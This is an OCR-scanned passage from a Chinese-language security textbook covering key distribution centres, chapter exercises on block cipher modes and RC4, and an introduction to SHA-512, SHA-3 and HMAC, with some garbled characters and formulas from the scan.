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e 永久 密 钥 : 永久 密 钥 是 在 实体 之 间 用 于 分 发 会 话 密 钥 的 。 

配置 包含 如 下 元 素 : 

e 密 钥 分 发 中 心 : 密 钥 分 发 中 心 (KDC) 判断 哪些 系统 允许 相互 通信 。 当 两 个 系统 被 允 

许 建立 连接 时 ， 密 钥 分 发 中 心 就 为 这 条 连接 提供 一 个 一 次 性 会 话 密 钥 。 
© 安全 服务 模块 : 这 个 模块 可 能 包含 一 个 协议 层 上 的 功能 ， 执 行 端 到 端 加 密 ， 为 用 户 获 
取 会 话 密 钥 。 

图 20-10 中 显示 了 建立 连接 包含 的 步骤 。 当 一 个 主机 期 望 与 另 一 个 主机 建立 连接 时 ， 它 
传送 一 个 连接 请 求 包 (步骤 1 )。SSM 保存 这 个 包 ， 向 KDC 申请 建立 连接 的 许可 (步骤 2 )。 
SSM 和 KDC 之 间 的 通信 使 用 一 个 只 由 此 SSM 和 KDC 共享 的 主 密 钥 加 密 。 如 果 KDC 批准 此 
连接 请 求 ， 它 产生 一 个 会 话 密 钥 并 将 其 传递 给 这 两 个 SSM， 向 每 个 SSM 传递 时 分 别 使 用 唯一 
的 永久 密 钥 (步骤 3 )。 发 出 请 求 的 SSM 现在 可 以 释放 连接 请 求 包 ， 并 且 在 这 两 个 端 系统 之 间 
建立 连接 (步骤 4)。 这 两 个 端 系统 之 间 交 换 的 所 有 数据 都 通过 它们 各 自 的 SSM 使 用 一 次 性 会 
话 密 钥 加 密 。 

这 个 自动 密 钥 分 发 方法 提供 了 允许 大 量 终端 用 户 访问 大 量 主机 以 及 主机 间 交 换 数据 所 需要 
的 灵活 性 和 动态 特性 。 

另外 一 种 密 钥 分 发 使 用 公 钥 加 密 ， 将 在 第 21 章 中 讨论 。 


20.8 推荐 读物 
在 [STAL14a] 中 有 关于 本 章 要 点 的 更 详细 的 介绍 。 


STALI14a Stallings, W. Cryptography and Network Security: Principles and Practice, Sixth 
Edition. Upper Saddle River, NJ: Prentice Hall, 2014. 


20.9 关键 术语 、 复 习题 和 习题 


关键 术语 
Advanced Encryption Standard (AES， 高 级 加 密 — encryption (加密) 

标准 ) end-to-end encryption ( 端 到 端的 加 密 ) 
block cipher (分 组 密码 ) Feistel cipher (Feistel 密码 ) 
brute-force attack (AAD) key distribution ( 密 钥 分 发 ) 


computationally secure (计算 安全 性 ) 

cipher block chaining (CBC) mode (密码 分 组 链接 
模式 ) 

cipher feedback (CFB) mode (密码 反馈 模式 ) 

ciphertext ( 密 文 ) 

counter mode (计数 器 模式 ) 

cryptanalysis (密码 分 析 学 ) 

Data Encryption Standard (DES， 数 据 加 密 标准 ) 

decryption (解密 ) 

electronic codebook (ECB) mode (电码 本 模式 ) 


复习 题 


20.1 ”对 称 密码 的 本 质 成 分 是 什么 ? 
20.2 ”密码 算法 的 两 个 基本 函数 是 什么 ? 


keystream ( 密 钥 流 ) 

link encryption ( 链 路 加 密 ) 
modes of operation (操作 模式 ) 
plaintext (明文 ) 

session key (会 话 密 钥 ) 

stream cipher ( 流 密码 ) 

subkey ( 子 密 钥 ) 

symmetric encryption (对 称 加 密 ) 
triple DES (3DES, =# DES) 
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20.3 用 密码 进行 通信 的 两 个 人 需要 多 少 密 钥 ? 

20.4 分 组 密码 与 流 密 码 的 区 别 是 什么 ? 

20.5 攻击 密码 的 两 种 一 般 方 法 是 什么 ? 

20.6 ”为 什么 某 些 分 组 密码 的 操作 模式 仅 使 用 加 密 算法 ， 而 其 他 的 模式 既 使 用 加 密 算法 又 使 用 解密 
算法 ? 

20.7 什么 是 三 重 加 密 ? 

20.8 ”为 什么 3DES 的 中 间 部 分 采用 了 解密 而 不 是 加 密 ? 

20.9 链 加 密 和 端 对 端 加 密 的 区 别 是 什么 ? 

20.10 ”请 列 出 密 钥 分 配 到 通信 双方 的 几 种 方法 。 

20.11 会话 密 钥 和 主 密 钥 的 区 别 是 什么 ? 

20.12 ”什么 是 密 钥 分 发 中 心 ? 


习题 
20.1 说 明 Feistel 解密 是 Feistel 加 密 的 逆 过 程 。 
20.2 ”考虑 一 个 由 16 轮 的 128 位 长 的 分 组 和 128 位 长 的 密 钥 组 成 的 Feistel 密码 。 假 设 对 于 一 个 给 定 的 ， 
密 钥 产生 算法 决定 了 前 8 轮 的 密 钥 值 k, kak, RIS 
ko=ke, kio= kn, ku =ke," kie = ki 
假设 你 有 一 个 密 文 c， 解 释 怎样 通过 获得 一 个 加 密 oracle (encryption oracle) 并 且 怎 样 只 使 用 
一 个 单独 的 oracle 询问 来 决定 m。 这 表明 了 该 密码 是 容易 受到 选择 明文 攻击 的 。( encryption oracle 
可 以 被 认为 是 一 个 设备 ， 该 设备 对 于 一 个 给 定 的 明文 ， 能 生成 相应 的 密 文 。 你 不 知道 该 设备 的 内 
部 细节 并 且 不 能 打开 该 设备 。 你 只 能 通过 询问 该 设备 并 获得 它 的 应 答 来 获取 信息 。) 
20.3 ”对 于 任意 分 组 密码 ， 事 实 是 ， 它 是 一 个 非 线性 函数 对 于 其 安全 性 是 至 关 重 要 的 。 看 这 个 例子 ， 假 
设 我 们 有 一 个 线性 分 组 密码 EL， 它 加 密 一 个 128 位 的 明文 产生 128 位 的 密 文 。EL(k, m) 表示 利用 
一 个 密 钥 k(k 的 实际 长 度 是 无 关 紧 要 的 )， 因 此 : 
EL(k,[mi ® m2])=EL(k, m) ® EL(k, m) 对 所 有 128 位 模式 的 m, m 解释 敌手 怎样 利用 128 
个 选择 密 文 ， 在 不 知道 选择 密 钥 的 情况 下 可 以 解密 任何 密 文 。( 一 个 “选择 密 文 ”是 指 敌 手 可 以 
通过 选择 一 个 密 文 获得 它 的 解密 。 这 里 ， 有 128 个 明 / 密 文 对 ， 并 且 可 以 选择 密 文 的 值 。) 
20.4 怎样 的 RC4 密 钥 会 使 S$ 在 初始 化 时 不 被 改变 ? 即 在 S 的 初始 化 排列 之 后 ，S 中 的 各 元 素 的 值 等 于 
0 ~ 255 的 升序 排列 值 。 
20.5 ”RC4 有 一 个 秘密 的 内 部 状态 ， 它 是 向 量 S 以 及 两 个 下 标 i 和 j 的 所 有 可 能 值 的 排列 。 
a. 使 用 一 个 简单 的 方案 来 存储 此 内 部 状态 ， 要 使 用 多 少 位 ? 
b. 假设 我 们 从 这 个 状态 能 代表 多 少 信息 量 的 观点 来 思考 它 。 这 样 我 们 需要 判断 有 多 少 种 不 同 的 状 
态 ， 然 后 取 以 2 为 底 的 对 数 来 得 到 它 代表 了 多 少 位 的 信息 量 。 使 用 此 方法 ， 需 要 多 少 位 来 代表 
这 个 状态 ? 
20.6 利用 ECB 模式， 如 果 传 输 密 文 的 一 个 分 组 出 错 ， 只 有 对 应 的 明文 分 组 受 影响 。 但 是 利用 CBC 模 
R, 会 传播 错误 。 例 如 ,传输 的 C (图 20-6 ) 中 的 错误 显然 会 破坏 P 和 Pro 
a. BRP, 之 外 还 有 其 他 分 组 受 影响 吗 ? 
b. 假设 Pi 的 源 版 本 中 有 1 位 的 错误 。 此 错误 会 传播 多 少 密 文 分 组 ? 接收 端 所 受 的 影响 是 什么 ? 
20.7 假设 在 利用 CBC 传输 一 个 密 文 分 组 时 发 生 了 一 个 错误 ， 将 会 对 相应 的 明文 分 组 产生 怎样 的 
影响 ? 
20.8 假设 你 想 做 一 个 用 CBC 模式 进行 分 组 加 密 的 硬件 设备 ， 要 求 算法 强度 比 DES 强 。3DES 是 一 个 很 
好 的 候选 算法 。 图 20-11 给 出 了 两 种 方案 ,使 用 的 都 是 CBC 模式 。 你 将 选择 哪 一 个 ? 
a. 从 安全 性 角度 考虑 。 
b. 从 性 能 上 考虑 。 
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20.9 假设 使 用 3DES 芯片 和 一 些 异 或 函数 ， 你 能 对 图 20-11 中 给 出 的 两 种 方案 进行 安全 性 修改 吗 ? 假设 


20.10 


20.11 


20.12 





仍旧 使 用 两 个 密 钥 。 

P, 

Os 

Kk 
C, 
a) 单 轮 CBC b) 三 轮 CBC 
图 20-11 将 3DES 用 于 CBC 模式 

填 满 下 表 剩 余 位 置 : 
















Ci=EK[P © IV) P\=D(K, C) ® IV 
G=EKIP,O Ga) j=1l%,N | P=DK, C0) ® G1 j=2%,N 










电码 本 (ECB) 模式 P=D(K,C) j=1,",N 


密码 分 组 链接 (CBC) 模式 





密码 反馈 (CFB) 模式 
计数 器 (CTR) 模式 


CBC-Pad 是 RC5 分 组 密码 使 用 的 分 组 密码 操作 模式 ， 但 它 能 在 任何 分 组 密码 中 使 用 。CBC-Pad 
处 理 任意 长 度 的 明文 ， 密 文 最 多 比 明文 长 一 个 分 组 ， 填 充 字 节 用 来 保证 明文 输入 是 分 组 长 度 的 倍 
数 ， 这 假设 了 原始 明文 是 整数 个 字 节 。 明 文 在 末尾 添加 的 字 节 数 可 以 是 1 到 bb, HH bb 等 于 以 
字 节 表示 的 分 组 大 小 。 填 充 的 字 节 都 相等 并 设 为 一 个 代表 填充 字 节 数 的 字 节 。 例 如 ， 如 果 添 加 了 
8 个 字 节 ， 每 个 字 节 的 比特 表示 则 为 00001000。 为 什么 不 允许 填充 0 FAT? 即 如 果 原 始 明文 是 分 
组 大 小 的 整数 倍 ， 为 什么 不 会 避免 进行 填充 ? 

填充 并 不 总 是 合适 的 。 例 如 ， 也 许 希 望 在 存储 明文 的 同一 内 存 缓冲 区 存储 加 密 的 数据 。 在 这 种 情 
况 下 ， 密 文 必须 与 原始 明文 等 长 。 用 于 此 目的 的 一 个 模式 是 密 文 窃取 ( CipherText Stealing, CTS) 
模式 。 图 20-12a 表示 这 个 模式 的 实现 。 

a. 解释 它 是 怎样 工作 的 。 

b. 描述 怎样 解密 Ci 和 Cro 


B20¢ xh PY EUNE 473 


IV P, 





© 
C, 





a) 密 文 窃取 模式 
P, Py, Py. Py 
i (2 位) (65 位 ) (B45 位 ) 0U 位 ) 





C, Cy Cy Cy 
(bb fit) (bb fit) (bb fit) (位 ) 
b) 替代 方法 


图 20-12 用 于 非 分 组 大 小 倍数 的 明文 的 分 组 密码 操作 模式 


20.13 图 20-12b 显示 了 当 明 文 不 是 分 组 大 小 的 整数 倍 时 产生 和 明文 等 长 的 密 文 的 CTS 的 替代 方法 。 
a. 解释 此 方法 。 
b. 解释 为 什么 CTS 优 于 图 20-2b 的 方法 。 
20.14 ”如 果 在 以 8 位 CFB 模式 传输 密 文 字符 时 发 生 了 1 位 的 错误 ， 错 误会 传播 多 远 ? 
20.15 一 种 使 用 最 广泛 的 消息 认证 码 (MAC) 是 数据 认证 算法 ( Data Authentication Algorithm)， 它 是 基 
F DES 的 ， 同 时 该 算法 既是 FIPS 发 布 版 本 (FIPS PUB 113) 又 是 ANSI 标准 (X9.17 )。 该 算法 
可 以 被 定义 为 一 个 初始 向 量 为 0 的 密码 分 组 链接 模式 (CBC) 的 DES 操作 ， 需 要 被 认证 的 数据 
(如 消息 、 记 录 、 文 件 或 程序 ) 被 分 成 连续 的 64 位 的 分 组 : Pi, P,…, Pw。 如 果 有 必要 ， 最 后 的 一 
个 分 组 在 右边 用 0 填充 形成 一 个 满 64 位 的 分 组 。 消 息 认证 码 (MAC) 或 者 由 整个 密 文 分 组 Cw 或 
者 分 组 的 左边 MMAR (16 科 M 科 64 )。 表 示 出 使 用 密码 反馈 模式 产生 的 相同 的 结果 。 
20.16 密 钥 分 发 方案 使 用 了 一 个 访问 控制 中 心 (access control center) 或 一 个 密 钥 分 发 中 心 (key 
distributing center)， 中 心 结 点 易 受 攻击 。 讨 论 这 种 集中 化 的 安全 隐患 。 
20.17 假设 某 人 建议 了 如 下 的 方法 来 确认 你 们 两 个 人 拥有 同一 密 钥 。 你 建立 一 个 长 为 密 钥 长 度 的 随机 位 
串 ， 将 它 和 密 钥 异 或 并 发 回 它 。 你 进行 核对 并 且 如 果 你 接收 到 的 是 你 的 原始 随机 串 ， 你 就 证 实 了 
你 的 伙伴 拥有 同一 密 钥 ， 而 你 们 两 个 人 还 没有 传递 过 密 钥 。 这 个 方案 有 什么 缺陷 吗 ? 668 
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学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
理解 SHA-1 和 SHA-2 的 操作 ; 


概述 HMAC 在 消息 认证 中 的 应 用 ; 
描述 RSA 算法 ; 
描述 Diffie-Hellman 算法 。 


本 章 介绍 第 2 章 中 从 2.2 节 到 2.4 节 所 介绍 的 内 容 的 技术 细节 。 


21.1 安全 散 列 函数 


单 向 散 列 函数 或 安全 散 列 函数 ， 不 仅 在 消息 认证 中 很 重要 ， 在 数字 签名 中 也 很 重要 。2.2 
节 中 讨论 了 安全 散 列 函数 的 要 求 和 安全 性 。 这 里 ， 我 们 讨论 几 种 散 列 函数 ， 并 研究 使 用 最 广泛 
的 一 种 散 列 函数 : SHA。 


21.1.1 简单 散 列 函数 


所 有 的 散 列 函数 通常 都 遵循 以 下 的 原则 。 输 入 消息、 文件 等 ) 都 可 看 作 是 一 个 n 位 分 组 
的 序列 。 散 列 函 数 每 次 处 理 一 个 输入 分 组 ， 反 复 地 产生 一 个 n 位 的 散 列 值 。 
最 简单 的 散 列 函数 之 一 是 将 每 个 分 组 逐 位 异 或 (XOR)， 这 个 函数 可 描述 如 下 : 
C=bn © bz D ® bim 
其 中 : 
GC: 二 散 列 码 的 第 i 位 ,1<i<n 
m= AP n 位 分 组 的 个 数 
bj=% j 个 分 组 的 第 i 位 
名 = 二 异 或 运算 
图 21-1 说 明了 这 个 运算 过 程 ; 它 对 每 一 位 产生 一 个 简单 的 奇偶 校 验 ， 称 之 为 纵向 元 余 校 
验 。 这 种 方法 对 于 随机 数据 的 数据 完整 性 检查 非常 有 效 。 如 果 每 个 n 位 的 散 列 值 出 现 的 概率 都 
相同 ， 那 么 数据 出 错 而 不 引起 散 列 值 改变 的 概率 为 2"。 若 数据 格式 不 是 随机 的 ， 则 会 降低 函 
数 的 有 效 性 。 例 如 ， 通 常 大 多 数 文本 文件 中 每 个 8 位 字 节 的 高 位 总 为 0， 若 使 用 128 位 的 散 列 
670) 值 ， 则 对 这 类 数据 ， 散 列 值 函数 的 有 效 性 是 2 而 不 是 2, 
A sh eas 位 1 位 2 位 n 


或 施 转 。 这 个 过 程 可 归纳 如 下 ， 
1. n 位 散 列 值 的 初 值 为 0。 
2. 如 下 处 理 每 个 n 位 分 组 : 
a. 将 当前 的 散 列 值 循环 左 移 一 次 。 
b. 将 该 分 组 与 散 列 值 异 或 。 图 21-1 按 位 异 或 的 简单 散 列 函 数 
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这 样 ， 可 使 输入 更 加 完全 地 “随机 ”， 从 而 消除 输入 数据 的 规则 性 。 

虽然 这 种 改进 的 方法 可 以 很 好 地 保证 数据 的 完整 性 ， 但 是 如 果 使 用 图 2-6a 和 b 所 示 的 方 
法 ， 即 加 密 后 的 散 列 码 附 在 明文 之 后 ， 那 么 该 方法 不 能 保证 数据 的 完整 性 。 因 为 很 容易 产生 一 
条 新 消息 ， 使 它 与 给 定 的 消息 具有 相同 的 散 列 码 : 先 选 定 某 消息 ， 然 后 在 其 后 附加 一 个 n 位 分 
组 ,使 它们 与 给 定 的 消息 具有 相同 的 散 列 码 。 l 

如 果 只 对 散 列 码 加 密 ， 那 么 上 述 简单 异 或 或 循环 异 或 (RXOR) 方法 不 能 保证 数据 的 安全 
性 ， 但 是 如 果 对 消息 和 散 列 码 均 加 密 ， 你 可 能 认为 这 个 简单 的 函数 是 有 效 的 ， 但 这 些 方法 可 能 
仍然 存在 问题 。 国 家 标准 局 最 初 提出 了 一 种 方法 ， 这 种 方法 对 64 位 的 分 组 执行 简单 异 或 操作 ， 
然后 使 用 密 文 块 链接 (CBC) WHAM BMA BI. BERN, X, +, Xv, HX 64 
位 的 分 组 ， 其 散 列 码 C 为 所 有 分 组 的 异 或 ， 并 且 将 该 散 列 码 作为 最 后 一 个 分 组 。 

C=Xv =X ONOD…OX 
然后 ， 使 用 CBC 模式 对 消息 和 散 列 码 加 密 得 到 Y,, Yo, =, Yno 文献 [JUEN85] 中 给 出 了 几 
种 改变 消息 密 文 而 散 列 码 无 法 检测 的 攻击 。 例 如 ， 根 据 CBC 的 定义 ( 见 图 20-6 )， 我 们 有 
X=V® D(K, Yı) 
X= ® D(K, Y) 
Xna = Yy © D(K, Yu) 
且 散 列 码 Xv 为 
Xr =X, ®© X DO…Xy 
=[IV ® DKK, %1)] ® [NM © D(K, ¥2)] D--® [Yn-1 ® D(K, YW)] 

由 于 上 述 等 式 中 异 或 可 以 按 任意 顺序 计算 ， 所 以 改变 密 文 分 组 的 顺序 ， 散 列 码 仍然 不 变 。 


21.1.2 SHA 安全 散 列 函数 


安全 散 列 算法 (SHA) 由 美国 标准 与 技术 研究 所 (NIST) 设计 于 1993 年 并 作为 联邦 信息 
处 理 标准 (FIPS 180) 发 布 ， 修 订 版 于 1995 年 发 布 (FIPS 180-1 )， 通 常 称 之 为 SHA-1。RFC 
3174 也 给 出 了 SHA-1， 它 基本 上 复制 了 FIPS 180-1 中 的 内 容 ， 但 增加 了 C 代码 的 实现 。 

SHA-1 产生 160 位 的 散 列 值 。2002 年 ，NIST 制定 了 新 版 本 标准 : FIPS 180-2。 它 定义 了 
三 种 新 版 本 的 SHA， 散 列 值 的 长 度 分 别 为 2356、384、512 比特 ， 分 别称 为 SHA-256、SHA- 
384、SHA-512 ( 见 表 21-1 )。 新 版 本 使 用 了 与 SHA-1 相同 的 底层 结构 和 相同 类 型 的 模 运 算 以 
及 相同 的 二 元 逻辑 运算 。2005 年 ，NIST 宣布 计划 到 2010 年 不 再 认可 SHA-1， 转 为 信任 其 
他 SHA 版 本 。 此 后 不 久 ， 有 个 研究 团队 描述 了 一 种 攻击 方法 。 该 方法 可 以 找到 产生 相同 的 
SHA-1 的 两 条 独立 的 消息 ， 他 们 只 用 2° 次 操作 ， 远 少 于 以 前 认为 找到 SHA-1 碰撞 所 需 的 2” 
次 操作 [WANG05]。 这 个 结果 将 加 快 SHA-1 过 渡 到 其 他 版 本 的 速度 。 


表 21-1 SHA 的 参数 比较 


SHA-512 
消息 摘要 大 小 


分 组 大 小 


注 : 1. 所 有 大 小 均 以 比特 为 单位 。 
2. 安全 依据 : 对 大 小 为 nn 的 消息 摘要 进行 生日 攻击 ， 大 约 以 2 的 工作 因子 产生 碰撞 。 
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图 21-2 用 SHA-512 生成 消息 摘要 


本 节 将 对 SHA-512 进行 描述 。 其 他 版 本 与 其 非常 类 似 。 该 算法 以 最 大 长 度 不 超过 2” 比 
特 的 消息 作为 输入 ， 生 成 512 比特 的 消息 摘要 输出 。 输 入 以 1024 比特 的 数据 块 进行 处 理 。 
图 21-2 描述 了 处 理 消 息 生 成 摘要 的 全 过 程 。 处 理 过 程 包括 以 下 步骤 : 


步骤 1: 增加 填充 位 。 填 充 消 息 使 其 长 度 与 896 模 1024 同 余 ( 即 长 度 二 896mod 
1024 )。 即 使 已 经 满足 上 述 长 度 要 求 ， 仍 然 需要 进行 填充 ， 因 此 填充 位 数 在 1 ~ 1024 
之 间 。 填 充 由 一 个 1 和 后 续 的 0 组成。 
步骤 2: 填充 长 度 。 在 消息 后 附加 128 位 的 分 组 。 将 其 看 作 128 位 的 无 符号 整数 (最 高 
有 效 字 节 在 前 )， 它 还 含有 原始 消息 (未 填充 前 ) 的 长 度 。 
前 两 步 生成 了 长 度 为 1024 比特 整数 倍 的 消息 。 在 图 21-2 中 ， 被 延展 的 消息 表 示 
为 1024 比特 数据 块 序列 Mi, Mae, Mw， 所 以 延展 后 消息 总 长 度 为 比 NX 1024 比特 。 
步骤 3 : 初始 化 散 列 缓冲 区 。 散 列 函数 的 中 间 结 果 和 最 终结 果 保 存在 512 位 的 缓冲 区 
中 ,缓冲 区 用 8 个 64 位 的 寄存 器 (a、b、c、d、e、f、g、h) 表示 ， 并 将 寄存 器 初始 
化 为 下 列 64 位 的 整数 (十 六 进 制 值 ): 
a=6A09E667F3BCC908 e=510E527FADE628D1 
b=BB67AE8584CAA73B f=9B05688C2B3E6C1F 
c=3C6EF372FE94F82B g= 1F83D9ABFB41BD6B 
d=A54FF53A5F1D36F1 h=5BE0CD19137E2179 
这 些 值 以 逆序 的 形式 存储 ， 即 字 的 最 高 字 节 存在 最 低地 址 (最 左边 ) 字 节 位 置 。 这 
些 字 取 自前 8 个 素数 平方 根 小 数 部 分 的 前 64 比特 。 
步骤 4 : 以 1024 位 ( 128 个 字 ) 为 单位 处 理 消息 。 算 法 的 核心 是 具有 80 轮 运算 的 模 
块 。 该 模块 在 图 21-2 中 标记 为 FE， 图 21-3 说 明了 它们 的 逻辑 关系 。 
每 一 轮 都 以 512 比特 的 缓冲 区 值 abcedfgh 作为 输入 ， 并 且 更 新 缓冲 区 内 容 。 在 第 
一 轮 的 输入 端 ， 缓 存 中 间 散 列 值 fH ,。 在 任意 第 t 轮 ， 使 用 从 当前 正在 处 理 的 1024 比 
特 数据 块 (M) 获取 64 比特 值 氛 。 每 一 轮 还 使 用 外 加 常数 K， 其 中 O<t<79 表示 
80 轮 中 的 某 一 轮 。 这 些 字 取 自前 80 个 素数 的 立方 根 小 数 部 分 的 前 64 比特 。 这 些 常数 


B21% AGBBRHAUIE 477 


用 来 随机 化 64 比特 模式 ， 消 除 输入 数据 中 的 任何 规则 性 。 每 轮 中 的 操作 包括 循环 移 
位 和 基于 与 (AND)、 或 (OR)、 非 M, 
(NOT) 和 异 或 (XOR) 的 逻辑 运算 。 

第 80 轮 的 输出 加 到 第 1 轮 的 输 
A (Hi) 生成 Hi。 缓 冲 区 里 的 任意 
8 个 字 与 H POF 2% 独立 
相 加 。 

e 步骤 5: 输出 。 当 所 有 NW 个 1024 比 
特 的 数据 块 都 处 理 完毕 后 ， 从 第 入 
个 阶段 输出 的 便 是 512 比特 的 消息 
摘要 。 

SHA-512 算法 使 得 散 列 码 的 任意 比特 
都 是 输入 端 每 1 比特 的 函数 。 基 本 函数 下 
的 复杂 和 迭代 产生 很 好 的 混淆 效果 ; 即 随机 选 
取 两 组 即使 有 很 相似 的 规则 性 的 消息 也 不 
可 能 生成 相同 的 散 列 码 。 除 非 SHA-512 隐 
含 一 些 直 到 现在 还 没有 公布 的 弱点 ,构造 
具有 相同 消息 摘要 的 两 条 消息 的 难度 的 数 
BRA 2 步 操 作 ， 而 找 出 给 定 的 摘要 的 消 
息 难 度 为 222 步 操作 。 


21.1.3 SHA-3 


SHA-2， 特 别 是 $12 位 版 本 ， 具 有 难 
以 破解 的 安全 性 。 尽 管 如 此 ， 有 一 点 依然 需要 注意 ， 即 SHA-2 与 其 后 继 版 本 都 具有 相同 的 结 
构 和 相同 的 数学 操作 。 一 旦 SHA-2 的 漏洞 被 发 现 ， 寻 找 其 替代 算法 将 需要 很 长 时 间 。 因 此 ， 
NIST 在 2007 年 宣布 征集 下 一 代 NIST 散 列 函数 ， 并 称 之 为 SHA-3。 任 何 SHA-3 候选 算法 必 
须 满足 下 列 要 求 : 

1. SHA-3 必须 能 够 在 任何 应 用 中 即 插 即 用 地 替代 SHA-2。 因 此 ，SHA-3 必须 支持 长 度 为 
224、256、384 和 512 位 的 散 列 值 。 

2. SHA-3 必须 保留 SHA-2 的 在 线 特性 。 也 就 是 说 ,该 算法 必须 能 够 一 次 处 理 相 对 小 的 消 
息 分 组 ( 512 或 1024 位 )， 而 不 将 未 处 理 的 消息 整体 缓存 在 内 存 中 。 


21.2 HMAC 


近年 来 ， 人 们 越 来 越 感 兴趣 于 加 密 散 列 码 的 使 用 ， 如 用 SHA-1 来 设计 MAC。 这 是 因为 以 
下 的 原因 : 

e 一 般 的 密码 散 列 函数 其 软件 执行 速度 比 诸如 DES 这 样 的 传统 加 密 要 快 。 

© 密码 散 列 函数 的 代码 库 得 到 了 广泛 的 应 用 。 

诸如 SHA-1 这 样 的 散 列 函数 并 不 是 专 为 MAC 而 设计 的 ， 由 于 散 列 函数 不 依赖 于 秘密 密 
钥 ， 所 以 它 不 能 直接 用 于 MAC。 有 目前， 关于 将 密 钥 加 到 现 有 的 散 列 函数 中 已 经 提出 了 许多 方 
案 ，HMAC[BELL96] 是 最 受 欢迎 的 方案 之 一 。HAMC (RFC 2104) 被 候选 为 正安 全 中 实现 
MAC 必须 使 用 的 方法 ， 并 且 其 还 用 于 其 他 Internet 协议 中 ， 如 传输 层 安全 (TTL, 很 快 将 取代 
安全 套 接 字 层 (SSL) ) 和 安全 电子 传输 (SET) 协议 。 


Hi 





图 21-3 SHA-512 处 理 单个 1024 比特 的 数据 块 
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21.2.1 HMAC 设计 目标 


RFC 2104 给 出 了 HMAC 的 设计 目标 : 
e 不 必修 改 而 直接 使 用 现 有 的 散 列 函数 。 特 别 地 ， 很 容易 免费 得 到 软件 上 执行 速度 较 快 
的 散 列 函数 及 其 代码 。 

e 如 果 找 到 或 者 需要 更 快 或 更 安全 的 散 列 函数 ， 应 能 很 容易 蔡 代 原来 嵌入 的 散 列 函数 。 

© 应 保持 散 列 函数 的 原 有 性 能 ， 不 能 过 分 降低 其 性 能 。 

e 对 称 密 钥 的 使 用 和 处 理应 比较 简单 。 

e 如 果 已 知 嵌 入 的 散 列 函数 的 强度 ， 则 完全 可 以 知道 认证 机 制 抗 密码 分 析 的 强度 。 

前 两 个 目标 是 HMAC 为 人 们 所 接受 的 原因 。HMAC 将 散 列 函 数 看 作 是 “ 黑 盒 ”有 两 个 好 
处 。 第 一 ,实现 HMAC 时 ， 可 将 现 有 散 列 函数 作为 一 个 模块 ， 这 样 可 以 对 许多 HMAC 代码 预 
先 封装 ， 并 在 需要 时 直接 使 用 ; 第 二 ， 若 希望 替代 HMAC 中 的 散 列 函数 ， 则 只 需 删除 现 有 的 
散 列 函数 模块 并 加 和 新 的 模块 ， 例 如 需要 更 快 的 散 列 函数 时 就 如 此 处 理 。 更 为 重要 的 是 ， 如 果 
嵌入 的 散 列 函数 的 安全 受到 威胁 ， 那 么 只 需要 用 更 安全 的 散 列 函数 替换 散人 的 散 列 函数 。 这 样 
仍然 可 保持 HMAC 的 安全 性 。 

上 述 最 后 一 个 设计 目标 实际 上 是 HMAC 优 于 其 他 基于 散 列 函数 的 一 些 方法 的 主要 方面 。 
REMAN BA BAA FEN TRE, MAT LEAR HMAC 是 安全 的 。 本 节 后 面 再 讨论 
这 个 问题 ,下面 首先 讨论 HMAC 的 结构 。 


21.2.2 HMAC 算法 


图 21-4 给 出 了 HMAC 的 总 体 结构 ， 该 结构 定义 了 下 列 符号 : 
H=f A BSB PRK (如 SHA). 
M=HMAC AiR BMA (IEA BO RPE SEM) o 
Y=M 的 第 i 位 分 组 , OSI<L-1, 
L=M 中 的 分 组 数 。 
b= 每 一 分 组 所 含 的 位 数 。 
?一通 人 的 散 列 函数 所 产生 的 散 列 码 。 
K 一 秘密 密 钥 ; 若 密 钥 的 长 度 大 于 5b， 则 将 密 钥 作为 散 列 函 数 的 输入 来 产生 一 个 位 的 密 
A; 建议 密 钥 长 度 > n。 
KK*= 二 为 使 上 为 b 位 长 而 在 KK 左边 填充 0 后 所 得 的 结果 。 
ipad=00110110 (十 六 进 制 数 36 ) 重复 b/8 KAR. 
opad=01011100 (十 六 进 制 数 5C) 重复 b/8 次 结果 。 
HMAC 可 描述 如 下 : 
HMAC(K, M)=H[(K* © opad)||H[(K* © ipad)||M]] 
也 就 是 说 ， 
1. 在 有 的 左边 填充 0， 得 到 位 的 K (lon, Æ KÆ 16012, b=512, WK PIMA 44 
个 0 字 节 的 0x00 )。 
2. K* 与 ipad 执行 异 或 运算 (位 异 或 ) 产生 b 位 的 分 组 Sio 
3. 将 M 附 于 5S 后。 
4. 将 H 作 用 于 步骤 3 所 得 出 的 结果 。 
5. K* 与 opad 执行 异 或 运算 (位 异 或 ) 产生 4b 位 的 分 组 Soo 
6. 将 步骤 4 中 的 散 列 码 附 于 5。 后 。 
7.4% HEATER 6 所 得 出 的 结果 ， 并 输出 该 函数 值 。 


注意 , K 与 ipad 异 或 后 ， 其 信息 位 有 一 半 发 生 了 变化 ; 同样 , K5 opd 异 或 后 ， 其 信息 
位 另 一 半 也 发 生 了 变化 ， 这样， 通过 将 8 与 l 
S, 传 给 散 列 算法 中 的 压缩 函数 ， 我们 可 以 从 《“ P 
K 伪 随机 地 产生 出 两 个 密 钥 。 

HMAC 执行 了 三 次 散 列 压缩 函数 (对 5、 
S, 和 内 部 的 散 列 产生 的 分 组 )， 但 是 对 于 长 消 
息 ，HMAC 和 艇 入 的 散 列 函数 的 执行 时 间 应 
该 大 致 相同 。 


21.2.3 HMAC 的 安全 性 


任何 建立 在 敌人 散 列 函数 基础 上 的 
MAC， 其 安全 性 在 某 种 程度 上 依赖 于 该 散 列 
函数 的 强度 。HMAC 的 好 处 在 于 ， 其 设计 者 
可 以 证 明 骨 人 的 散 列 函数 的 强度 与 HMAC 的 
强度 之 间 的 联系 。 

根据 伪造 者 在 给 定时 间 内 伪造 成 功 
和 用 相同 密 钥 产 生 给 定数 量 的 消息 -MAC pat 
对 的 概率 ， 可 以 来 描述 MAC 函数 的 安全 7: 

性 。 本 质 上 ， 这 些 消 息 由 合法 用 户 产 生 。 
[BELL96] 中 已 经 证 明 ， 如 果 攻 击 者 已 知 seas ae 
若干 (时 间 ， 消 息 -MAC 对 )， 则 成 功 攻击 a 
HMAC WERE Ft BA I BY FI SZ: 

L 即使 对 攻击 者 而 言 ，IV 是 随机 的 、 秘 密 的 和 未 知 的 ， 攻 击 者 也 能 计算 压缩 函数 的 输出 。 

2. 即使 灰 是 随机 的 和 秘密 的 ， 攻 击 者 也 能 找到 散 列 函数 中 的 碰撞 。 

在 第 一 种 攻击 中 ， 我 们 可 将 压缩 函数 看 作 是 将 散 列 函数 应 用 于 只 含有 一 个 总 位 分 组 的 
消息 ， 散 列 函 数 的 太 被 一 个 二 位 秘密 的 随机 值 代替 。 攻 击 该 散 列 函数 或 者 是 对 密 钥 的 蛮 
